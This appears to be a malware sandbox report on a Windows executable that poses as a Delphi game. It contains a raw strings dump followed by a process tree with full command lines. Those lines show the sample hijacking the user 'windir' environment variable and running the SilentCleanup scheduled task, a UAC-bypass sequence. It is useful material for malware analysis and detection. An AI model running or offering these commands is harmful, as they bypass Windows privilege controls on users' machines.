PeekMessageA
OpenClipboard
OffsetRect
OemToCharA
MessageBoxA
MessageBeep
MapWindowPoints
MapVirtualKeyA
LoadStringA
LoadKeyboardLayoutA
LoadIconA
LoadCursorA
LoadBitmapA
KillTimer
IsZoomed
IsWindowVisible
IsWindowEnabled
IsWindow
IsRectEmpty
IsIconic
IsDialogMessageA
IsChild
IsCharAlphaNumericA
IsCharAlphaA
InvalidateRect
IntersectRect
InsertMenuItemA
InsertMenuA
InflateRect
GetWindowThreadProcessId
GetWindowTextA
GetWindowRect
GetWindowPlacement
GetWindowLongA
GetWindowDC
GetTopWindow
GetSystemMetrics
GetSystemMenu
GetSysColorBrush
GetSysColor
GetSubMenu
GetScrollRange
GetScrollPos
GetScrollInfo
GetPropA
GetParent
GetWindow
GetMessageTime
GetMenuStringA
GetMenuState
GetMenuItemInfoA
GetMenuItemID
GetMenuItemCount
GetMenu
GetLastActivePopup
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
GetIconInfo
GetForegroundWindow
GetFocus
GetDoubleClickTime
GetDesktopWindow
GetDCEx
GetDC
GetCursorPos
GetCursor
GetClipboardData
GetClientRect
GetClassNameA
GetClassInfoA
GetCaretPos
GetCapture
GetActiveWindow
FrameRect
FindWindowA
FillRect
EqualRect
EnumWindows
EnumThreadWindows
EnumClipboardFormats
EndPaint
EnableWindow
EnableScrollBar
EnableMenuItem
EmptyClipboard
DrawTextA
DrawMenuBar
DrawIconEx
DrawIcon
DrawFrameControl
DrawFocusRect
DrawEdge
DispatchMessageA
DestroyWindow
DestroyMenu
DestroyIcon
DestroyCursor
DeleteMenu
DefWindowProcA
DefMDIChildProcA
DefFrameProcA
CreatePopupMenu
CreateMenu
CreateIcon
CloseClipboard
ClientToScreen
CheckMenuItem
CallWindowProcA
CallNextHookEx
BeginPaint
CharNextA
CharLowerBuffA
CharLowerA
CharUpperBuffA
CharToOemA
AdjustWindowRectEx
ActivateKeyboardLayout
kernel32.dll
Sleep
oleaut32.dll
SafeArrayPtrOfIndex
SafeArrayGetUBound
SafeArrayGetLBound
SafeArrayCreate
VariantChangeType
VariantCopy
VariantClear
VariantInit
comctl32.dll
ImageList_SetIconSize
ImageList_GetIconSize
ImageList_Write
ImageList_Read
ImageList_GetDragImage
ImageList_DragShowNolock
ImageList_SetDragCursorImage
ImageList_DragMove
ImageList_DragLeave
ImageList_DragEnter
ImageList_EndDrag
ImageList_BeginDrag
ImageList_Remove
ImageList_DrawEx
ImageList_Draw
ImageList_GetBkColor
ImageList_SetBkColor
ImageList_ReplaceIcon
ImageList_Add
ImageList_SetImageCount
ImageList_GetImageCount
ImageList_Destroy
ImageList_Create
kernel32.dll
MulDiv
?,?P?
><?^?
>=?E?
?"?\?
<)=0=G=7?J?f?m?
? ?$?(?,?
?"?&?*?.?2?6?:?>?B?F?J?N?R?V?Z?^?
=O>t>
<E=U=D>a>
4L4_4d4|4
4P5W5
<R=R>
?/?p?
1 1(131=1J1O1W1a1l1
333333333333333333
33333333?333333
33?33
33833
333333333333333333
33333
333333333333333333
33333333?333333
33?33
33833
333333333333333333
33833
338?3
C33333833?33
3334JC33333338?333
333333333333333333
333333333333333333
33333
33333
3333333:3333333383
333333333333333333
33333
333333333333333333
333333333333333333
33333
33333
3333333:3333333383
333333333333333333
33330
33330
33330
33330
7Project1
5Themes
SysUtils
System
SysInit
KWindows
UTypes
SysConst
^Classes
"RTLConsts
3Messages
CVariants
$VarUtils
QTypInfo
sActiveX
+Graphics
Consts
CUxTheme
SyncObjs
CommCtrl
&Controls
Forms
Printers
WWinSpool
FlatSB
StdActns
Clipbrd
YStrUtils
*ShellAPI
EActnList
vMenus
Contnrs
ImgList
dStdCtrls
Dialogs
ExtCtrls
IDlgs
3CommDlg
(ShlObj
RegStr
?WinInet
UrlMon
WinHelpViewer
RHelpIntfs
MultiMon
Buttons
Idelzap
XGrids
5MaskUtils
liste
Unit1
console
vaffichage
>coeur
ecalcul
biMinimize
DrawGrid1MouseDown
Demarrerlejeu1Click
Pause1Click
Reprendrelejeu1Click
button
clock
combobox
explorerbar
header
listview
progress
rebar
scrollbar
startpanel
status
taskband
taskbar
toolbar
tooltip
trackbar
traynotify
treeview
window
USERPROFILE
No help keyword specified.
3D Dark Shadow
Button Shadow
- Dock zone not found
Cancel
Abort
Cannot hide an MDI Child Form)Cannot change Visible in OnShow or OnHide"Cannot make a visible window modal
Metafile is not valid
Invalid property value List capacity out of bounds (%d)
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Exception in safecall method
Write$Error creating variant or safe array
Floating point overflow
This file is not on VirusTotal.

Process Tree

  • iz3Ehm6t.exe 1964
    • cmd.exe 1340 cmd /c ""C:\Users\Public\Natso.bat" "
      • reg.exe 2352 reg delete hkcu\Environment /v windir /f
      • reg.exe 1592 reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\Yako.bat reg delete hkcu\Environment /v windir /f && REM "
      • schtasks.exe 2212 schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
      • reg.exe 2192 reg delete hkcu\Environment /v windir /f
    • cmd.exe 2444 cmd /c ""C:\Users\Public\Yeso.bat" "
    • ieinstal.exe 1540
  • svchost.exe 816 C:\Windows\system32\svchost.exe -k netsvcs

iz3Ehm6t.exe, PID: 1964, Parent PID: 2480
Full Path: C:\Users\user\AppData\Local\Temp\iz3Ehm6t.exe
Command Line: "C:\Users\user\AppData\Local\Temp\iz3Ehm6t.exe"
cmd.exe, PID: 1340, Parent PID: 1964
Full Path: C:\Windows\SysWOW64\cmd.exe
Command Line: cmd /c ""C:\Users\Public\Natso.bat" "
reg.exe, PID: 2352, Parent PID: 1340
Full Path: C:\Windows\SysWOW64\reg.exe
Command Line: reg delete hkcu\Environment /v windir /f
reg.exe, PID: 1592, Parent PID: 1340
Full Path: C:\Windows\SysWOW64\reg.exe
Command Line: reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\Yako.bat reg delete hkcu\Environment /v windir /f && REM "
schtasks.exe, PID: 2212, Parent PID: 1340
Full Path: C:\Windows\SysWOW64\schtasks.exe
Command Line: schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
svchost.exe, PID: 816, Parent PID: 460
Full Path: C:\Windows\sysnative\svchost.exe
Command Line: C:\Windows\system32\svchost.exe -k netsvcs